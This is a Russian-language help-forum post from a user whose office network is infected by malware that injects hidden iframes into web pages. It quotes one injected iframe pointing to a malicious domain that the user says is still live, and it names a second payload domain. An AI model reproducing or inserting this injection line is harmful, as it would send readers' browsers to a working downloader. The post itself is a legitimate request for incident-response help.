Возникла следующая ситуация.
Компьютер заразился вирусом. Стоит Антивирус Касперского, который, судя по всему, само ядро вируса не замечает. Реакция от Касперского следует только когда вирус встраивает во время серфинга по интернету в нейтральные страницы код, типа <iframe src="http://do.qwertyy.cn/do.html" width="1" height="1"> (осторожно, адрес страницы рабочий).
я расковырял с линукса js скрипт, который прогружается на той странице. Мои скромные познания помогли выявить, что это Downloader, который использует уязвимость в обновлениях кодеков. (Могу ошибаться.)
Вирус очень удачно распространяется в сети.
На данный момент, из 15 компьютеров в нашей сети, около 6 заражены этой хренью.
Буквально несколько дней назад, этот вирус вставлял iframe с ссылкой на ads009.info.
Проделал все шаги по инструкции на одном из инфицированных компьютерах. ОС на этом компьютере свежеустановленная. Ей 3 дня с момента полной переустановки. Вирус залез на компьютер по сети.
Прикладываю файлы отчета. Очень надеюсь на Вашу помощь.
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
вирус встраивает iframe с javascript-ом
